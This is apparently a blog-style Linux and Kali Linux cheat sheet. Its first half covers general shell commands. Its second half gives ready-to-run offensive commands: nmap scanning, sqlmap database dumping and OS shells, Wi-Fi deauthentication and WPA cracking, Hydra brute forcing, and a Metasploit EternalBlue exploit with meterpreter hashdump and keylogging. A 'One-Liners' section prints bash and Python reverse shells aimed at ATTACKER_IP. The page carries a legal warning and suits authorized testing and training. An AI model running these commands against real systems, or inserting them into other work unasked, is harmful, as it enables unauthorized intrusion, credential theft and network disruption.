This is the reference you keep open in a second terminal. Not a tutorial. Not a walkthrough. Just the commands you actually need, organized so you can find them in five seconds.
The first half covers Linux fundamentals that work on any distro. The second half is Kali-specific: reconnaissance, exploitation, wireless, web testing, and password cracking. Bookmark it. Print it. Tape it to your wall. Whatever works.
"The best hackers don't memorize commands. They memorize patterns and know exactly where to look up the syntax."
This isn't a tutorial. It's a weapon. Treat it like one.
Filesystem Navigation
The terminal is your home now. These commands are muscle memory or they're slowing you down.
bash
1pwd # Where am I?
2ls -la # List everything, permissions included
3ls -lah # Same but human-readable file sizes
4cd /etc # Go to absolute path
5cd .. # Up one directory
6cd ~ # Home directory
7cd - # Back to previous directory
8
9tree -L 2 # Visual directory tree, 2 levels deep
10find / -name "*.conf" # Find files by name (recursive from /)
11locate secret.txt # Fast search (uses database, run updatedb first)
12which nmap # Where is this binary?
13file mystery.bin # What type of file is this?Key Directories
| Path | What Lives Here |
|---|---|
/etc | System configuration files |
/var/log | Log files (goldmine for forensics) |
/tmp | Temporary files (cleared on reboot) |
/opt | Optional/third-party software |
/usr/bin | User binaries (most commands) |
/usr/share | Shared data (wordlists live here on Kali) |
/home | User home directories |
/root | Root user's home |
/proc | Virtual filesystem for running processes |
/dev | Device files |
File Operations
bash
1cp file.txt /tmp/ # Copy file
2cp -r folder/ /tmp/ # Copy directory recursively
3mv old.txt new.txt # Rename or move
4rm file.txt # Delete file (no confirmation)
5rm -rf folder/ # Delete directory and everything in it
6mkdir -p path/to/new/dir # Create nested directories
7touch newfile.txt # Create empty file or update timestamp
8
9cat file.txt # Print entire file
10head -20 file.txt # First 20 lines
11tail -f /var/log/syslog # Follow log in real time
12less file.txt # Scroll through file (q to quit)
13wc -l file.txt # Count lines
14diff file1.txt file2.txt # Compare two files
15
16tar czf archive.tar.gz folder/ # Compress directory
17tar xzf archive.tar.gz # Extract archive
18zip -r archive.zip folder/ # Create zip
19unzip archive.zip # Extract zipText Processing and Search
These commands turn raw output into usable intel. Chain them with pipes.
bash
1grep "password" file.txt # Search for string in file
2grep -ri "password" /etc/ # Recursive, case-insensitive
3grep -v "noise" results.txt # Invert match (exclude lines)
4grep -c "error" /var/log/syslog # Count matches
5grep -E "user|pass|key" dump.txt # Multiple patterns (regex)
6
7cut -d':' -f1 /etc/passwd # Extract first field (usernames)
8awk '{print $1}' access.log # Print first column
9sed 's/old/new/g' file.txt # Find and replace
10sort file.txt | uniq -c | sort -rn # Frequency count, most common first
11tr 'A-Z' 'a-z' < FILE # Convert to lowercase
12
13# The pipe chain that solves everything:
14cat dump.txt | grep "192.168" | cut -d' ' -f3 | sort -uPipe Everything
The real power isn't in any single command. It's in chaining them. cat | grep | cut | sort | uniq will extract exactly what you need from almost any text output. Learn piping and you'll never feel stuck staring at a wall of terminal output again.
Users, Permissions, and Ownership
bash
1whoami # Current user
2id # User ID, group memberships
3sudo su # Switch to root shell
4sudo -l # What can I sudo?
5passwd # Change your password
6
7useradd -m newuser # Create user with home directory
8usermod -aG sudo newuser # Add user to sudo group
9userdel -r olduser # Delete user and home directory
10
11chmod 755 script.sh # rwxr-xr-x
12chmod +x script.sh # Make executable
13chmod 600 secret.txt # Owner read/write only
14chown user:group file.txt # Change ownershipPermission Numbers Decoded
| Number | Permission | Meaning |
|---|---|---|
| 7 | rwx | Read + Write + Execute |
| 6 | rw- | Read + Write |
| 5 | r-x | Read + Execute |
| 4 | r-- | Read only |
| 0 | --- | Nothing |
Three digits: owner / group / everyone. So chmod 750 means owner gets full access, group gets read and execute, everyone else gets nothing.
Process Management
bash
1ps aux # All running processes
2ps aux | grep nmap # Find specific process
3top # Live process monitor
4htop # Better live monitor (if installed)
5
6kill 1234 # Send SIGTERM to PID 1234
7kill -9 1234 # Force kill (SIGKILL)
8killall firefox # Kill all processes by name
9pkill -f "python server" # Kill by pattern match
10
11jobs # List background jobs
12bg # Resume job in background
13fg # Bring job to foreground
14nohup ./long-task.sh & # Run and survive terminal close
15
16screen -S mysession # Start named screen session
17screen -r mysession # Reattach to session
18tmux new -s work # Start named tmux session
19tmux attach -t work # Reattach to tmux sessionNetworking Fundamentals
bash
1ip a # All interfaces and IPs
2ip route # Routing table
3ss -tlnp # Listening TCP ports with PIDs
4ss -ulnp # Listening UDP ports
5
6ping -c 4 target.com # 4 pings
7traceroute target.com # Trace route to target
8dig target.com # DNS lookup
9dig @8.8.8.8 target.com ANY # Full DNS query against Google
10nslookup target.com # Simple DNS lookup
11host target.com # Another DNS tool
12whois target.com # Domain registration info
13
14curl -I https://target.com # HTTP headers only
15curl -s https://target.com # Silent output (for piping)
16wget https://target.com/file.zip # Download file
17wget -r -l 2 https://target.com # Recursive download, 2 levels
18
19# Transfer files between machines
20python3 -m http.server 8080 # Quick HTTP server (current dir)
21scp file.txt user@host:/path/ # Secure copy over SSH
22rsync -avz folder/ user@host:/path/ # Sync directory over SSH
Package Management (Debian/Kali)
bash
1apt update # Refresh package lists
2apt upgrade # Upgrade installed packages
3apt install nmap # Install package
4apt remove nmap # Remove package (keep config)
5apt purge nmap # Remove package and config
6apt search "wireless" # Search for packages
7apt list --installed # List all installed packages
8dpkg -l | grep nmap # Check if specific package installed
9dpkg -i package.deb # Install local .deb fileService Management (systemd)
bash
1systemctl status ssh # Check service status
2systemctl start ssh # Start service
3systemctl stop ssh # Stop service
4systemctl restart ssh # Restart service
5systemctl enable ssh # Start on boot
6systemctl disable ssh # Don't start on boot
7systemctl list-units --type=service # List all services
8journalctl -u ssh -f # Follow service logsSSH
bash
1ssh user@target # Connect
2ssh -p 2222 user@target # Connect on custom port
3ssh -L 8080:localhost:80 user@target # Local port forward
4ssh -D 9050 user@target # SOCKS proxy through target
5ssh -i key.pem user@target # Connect with private key
6
7ssh-keygen -t ed25519 # Generate key pair (modern)
8ssh-copy-id user@target # Install your public key on remoteKali Arsenal
Everything above works on any Linux box. Everything below is why you boot Kali.
Legal Warning
Every tool in this section can land you in federal prison if used without authorization. Penetration testing requires explicit written permission from the system owner. "I was just learning" is not a legal defense. Lab environments, CTF competitions, and your own hardware are fair game. Everything else requires a signed contract.
Nmap (Network Reconnaissance)
The single most important tool in the arsenal. If you learn one thing on this page, learn nmap.
Discovery and Host Scanning
bash
1nmap -sn 192.168.1.0/24 # Ping sweep (find live hosts)
2nmap -sn -PR 192.168.1.0/24 # ARP ping (local network only)
3nmap target.com # Default scan (top 1000 TCP ports)
4nmap -p- target.com # All 65535 TCP ports
5nmap -p 80,443,8080 target.com # Specific ports
6nmap -p 1-1000 target.com # Port rangeService and OS Detection
bash
1nmap -sV target.com # Service version detection
2nmap -sV --version-intensity 5 target.com # Aggressive version scan
3nmap -O target.com # OS detection
4nmap -A target.com # Aggressive: OS + version + scripts + tracerouteScan Types
bash
1nmap -sS target.com # SYN scan (stealth, default with root)
2nmap -sT target.com # TCP connect scan (no root needed)
3nmap -sU target.com # UDP scan (slow but important)
4nmap -sS -sU target.com # TCP and UDP combined
5nmap -sN target.com # NULL scan (firewall evasion)
6nmap -sF target.com # FIN scan (firewall evasion)NSE Scripts
bash
1nmap --script=default target.com # Default script suite
2nmap --script=vuln target.com # Vulnerability detection scripts
3nmap --script=http-enum target.com # Web directory enumeration
4nmap --script=smb-vuln* target.com # SMB vulnerability checks
5nmap --script=ssl-heartbleed target.com # Heartbleed check
6nmap --script-help=http-enum # Script documentation
7
8# The "give me everything" scan:
9nmap -sS -sV -O -A --script=default,vuln -p- -oA full_scan target.comOutput Formats
bash
1nmap -oN scan.txt target.com # Normal output
2nmap -oX scan.xml target.com # XML output
3nmap -oG scan.gnmap target.com # Grepable output
4nmap -oA scan_results target.com # All three formats at once65,535
TCP ports per host. If you're only scanning the top 1000, you're missing things.
Web Application Testing
Gobuster (Directory and DNS Brute Force)
bash
1gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt
2gobuster dir -u http://target.com -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
3gobuster dir -u http://target.com -w wordlist.txt -x php,html,txt # File extensions
4gobuster dir -u http://target.com -w wordlist.txt -t 50 -o results.txt # 50 threads, save output
5gobuster dns -d target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txtNikto (Web Vulnerability Scanner)
bash
1nikto -h http://target.com # Basic scan
2nikto -h http://target.com -p 8080 # Custom port
3nikto -h http://target.com -o report.html -Format htm # HTML report
4nikto -h http://target.com -Tuning 9 # Test for SQL injectionSQLMap (SQL Injection)
bash
1sqlmap -u "http://target.com/page?id=1" # Test URL parameter
2sqlmap -u "http://target.com/page?id=1" --dbs # Enumerate databases
3sqlmap -u "http://target.com/page?id=1" -D dbname --tables # List tables
4sqlmap -u "http://target.com/page?id=1" -D dbname -T users --dump # Dump table
5sqlmap -u "http://target.com/page?id=1" --os-shell # OS shell (if possible)
6sqlmap -r request.txt # Test from saved Burp requestWhatWeb and curl Recon
bash
1whatweb target.com # Technology fingerprint
2whatweb -v target.com # Verbose output
3curl -s -o /dev/null -w "%{http_code}" http://target.com # Just the status code
4curl -s http://target.com | grep -i "powered by" # CMS detectionWireless Attacks (aircrack-ng Suite)
Monitor Mode and Capture
bash
1airmon-ng # List wireless interfaces
2airmon-ng start wlan0 # Enable monitor mode
3airmon-ng stop wlan0mon # Disable monitor mode
4
5airodump-ng wlan0mon # Scan all nearby networks
6airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
7# ^ Target specific network on channel 6, save to capture filesDeauthentication and Handshake Capture
bash
1# Force client disconnect to capture WPA handshake:
2aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
3# -0 = deauth, 5 = number of packets, -a = target AP BSSID
4
5# Wait for handshake in airodump-ng output, then crack:
6aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.capFull WPA Cracking Workflow
bash
1# 1. Start monitor mode
2airmon-ng start wlan0
3
4# 2. Scan for targets
5airodump-ng wlan0mon
6
7# 3. Target specific AP and capture
8airodump-ng -c [channel] --bssid [BSSID] -w capture wlan0mon
9
10# 4. Deauth a client (in second terminal)
11aireplay-ng -0 10 -a [BSSID] -c [CLIENT_MAC] wlan0mon
12
13# 5. Crack the captured handshake
14aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.capPassword Cracking
John the Ripper
bash
1john hashfile.txt # Auto-detect hash and crack
2john --wordlist=/usr/share/wordlists/rockyou.txt hashfile.txt
3john --show hashfile.txt # Show cracked passwords
4john --format=raw-sha256 hashfile.txt # Specify hash format
5
6# Crack /etc/shadow:
7unshadow /etc/passwd /etc/shadow > unshadowed.txt
8john unshadowed.txtHashcat (GPU-Accelerated)
bash
1hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt # MD5
2hashcat -m 1000 hashes.txt wordlist.txt # NTLM
3hashcat -m 1800 hashes.txt wordlist.txt # SHA-512 (Linux shadow)
4hashcat -m 2500 capture.hccapx wordlist.txt # WPA/WPA2
5
6# Rule-based attack (much more effective than straight wordlist):
7hashcat -m 0 hashes.txt wordlist.txt -r /usr/share/hashcat/rules/best64.ruleHydra (Online Brute Force)
bash
1hydra -l admin -P /usr/share/wordlists/rockyou.txt target.com ssh
2hydra -l admin -P passwords.txt target.com http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"
3hydra -L users.txt -P passwords.txt target.com ftp
4hydra -l admin -P passwords.txt rdp://target.comWordlists are stored in /usr/share/wordlists/ on Kali. rockyou.txt ships compressed. Decompress it first: gunzip /usr/share/wordlists/rockyou.txt.gz
Metasploit Framework
Core Commands
bash
msfconsole # Launch Metasploit1search eternalblue # Find exploit modules
2use exploit/windows/smb/ms17_010_eternalblue # Select module
3show options # View required settings
4set RHOSTS target.com # Set target
5set LHOST your.ip # Set listener IP
6set PAYLOAD windows/x64/meterpreter/reverse_tcp # Set payload
7exploit # LaunchMeterpreter Commands (Post-Exploitation)
1sysinfo # System information
2getuid # Current user
3getsystem # Attempt privilege escalation
4hashdump # Dump password hashes
5screenshot # Capture screen
6keyscan_start # Start keylogger
7keyscan_dump # Dump keystrokes
8download C:\\secret.txt # Download file from target
9upload backdoor.exe C:\\ # Upload file to target
10shell # Drop to system shell
11portfwd add -l 3389 -p 3389 -r target # Port forwardListener Setup
1use exploit/multi/handler
2set PAYLOAD windows/x64/meterpreter/reverse_tcp
3set LHOST 0.0.0.0
4set LPORT 4444
5exploit -j # Run as background jobPrivilege Escalation Recon
When you land on a box, these are the first things to check.
Linux Privilege Escalation
bash
1whoami && id # Who are you?
2sudo -l # What can you sudo?
3cat /etc/crontab # Scheduled tasks
4ls -la /etc/cron* # All cron directories
5find / -perm -4000 -type f 2>/dev/null # SUID binaries (gold)
6find / -writable -type f 2>/dev/null # World-writable files
7cat /etc/passwd # All users
8ls -la /home/ # Home directories
9env # Environment variables
10cat /proc/version # Kernel version
11uname -a # System info
12netstat -tlnp # Internal servicesWindows Privilege Escalation
cmd
1whoami /priv :: Check privileges
2net user :: List users
3net localgroup administrators :: Admin group members
4systeminfo :: Full system info
5tasklist /svc :: Running services
6netstat -ano :: Network connections
7reg query HKLM /f password /t REG_SZ /s :: Search registry for passwordsWordlists and Payloads
Kali Default Locations
bash
1/usr/share/wordlists/ # Main wordlist directory
2/usr/share/wordlists/rockyou.txt # The classic (14M passwords)
3/usr/share/wordlists/dirb/ # Web directory wordlists
4/usr/share/wordlists/dirbuster/ # More web directories
5/usr/share/seclists/ # SecLists collection (install: apt install seclists)
6/usr/share/nmap/scripts/ # NSE scripts
7/usr/share/webshells/ # Pre-built web shells
8/usr/share/exploitdb/ # Local exploit databaseGenerating Custom Wordlists
bash
1# Crunch (pattern-based):
2crunch 8 8 -t @@@@2024 -o wordlist.txt # 4 lowercase + "2024"
3crunch 6 8 0123456789 -o numeric.txt # 6-8 digit numbers
4
5# CeWL (scrape website for words):
6cewl https://target.com -d 2 -m 5 -w wordlist.txt
7# -d = depth, -m = min word length
8
9# Combine and deduplicate:
10cat list1.txt list2.txt | sort -u > combined.txtQuick Reference Tables
Common Port Numbers
| Port | Service | Notes |
|---|---|---|
| 21 | FTP | File transfer (often anonymous) |
| 22 | SSH | Secure shell |
| 23 | Telnet | Cleartext remote access (legacy) |
| 25 | SMTP | Email sending |
| 53 | DNS | Domain resolution |
| 80 | HTTP | Web traffic |
| 110 | POP3 | Email retrieval |
| 135 | MSRPC | Windows RPC |
| 139 | NetBIOS | Windows networking |
| 143 | IMAP | Email access |
| 443 | HTTPS | Encrypted web traffic |
| 445 | SMB | Windows file sharing |
| 993 | IMAPS | Encrypted IMAP |
| 1433 | MSSQL | Microsoft SQL Server |
| 3306 | MySQL | MySQL database |
| 3389 | RDP | Remote Desktop |
| 5432 | PostgreSQL | PostgreSQL database |
| 5900 | VNC | Virtual desktop |
| 6379 | Redis | In-memory database |
| 8080 | HTTP-Alt | Common alternate web port |
| 8443 | HTTPS-Alt | Common alternate HTTPS |
Hash Identification
| Hash Pattern | Type | Hashcat Mode |
|---|---|---|
| 32 hex chars | MD5 | -m 0 |
| 40 hex chars | SHA-1 | -m 100 |
| 64 hex chars | SHA-256 | -m 1400 |
| 128 hex chars | SHA-512 | -m 1700 |
$1$ prefix | MD5crypt | -m 500 |
$5$ prefix | SHA-256crypt | -m 7400 |
$6$ prefix | SHA-512crypt (Linux) | -m 1800 |
$2b$ prefix | bcrypt | -m 3200 |
| 32 hex chars (no salt) | NTLM | -m 1000 |
One-Liners That Save the Day
bash
1# Reverse shell (attacker listener):
2nc -lvnp 4444
3
4# Reverse shell (target, bash):
5bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
6
7# Reverse shell (target, python):
8python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
9
10# Upgrade dumb shell to interactive:
11python3 -c 'import pty; pty.spawn("/bin/bash")'
12# Then: Ctrl+Z, then:
13stty raw -echo; fg
14# Then: export TERM=xterm
15
16# Quick web server for file transfer:
17python3 -m http.server 8080
18
19# Base64 encode/decode:
20echo "secret" | base64
21echo "c2VjcmV0Cg==" | base64 -d
22
23# Check if you can reach the internet:
24curl -s ifconfig.me
25
26# Find recently modified files (last 10 minutes):
27find / -mmin -10 -type f 2>/dev/null
28
29# Hex dump a binary:
30xxd suspicious.bin | head -50The Methodology
Tools don't matter without a process. Here's the pattern that works:
- Reconnaissance: nmap, whois, dig, theHarvester. Map the target before you touch it.
- Enumeration: Service versions, directories, usernames, shares. Dig deeper into what recon found.
- Vulnerability Assessment: searchsploit, nmap scripts, nikto. Match findings to known weaknesses.
- Exploitation: Metasploit, manual exploits, password attacks. Gain initial access.
- Post-Exploitation: Privilege escalation, persistence, lateral movement. Expand access.
- Documentation: Screenshots, logs, timestamps. If you didn't document it, it didn't happen.
"Amateurs hack systems. Professionals hack people, processes, and then systems, in that order."
Your Kali Setup Checklist 0/7
This page covers the commands. The Hacker's Path series covers the thinking. If you want to understand why these tools work the way they do, start there. If you just need the syntax right now, you're already in the right place.
How was this article?
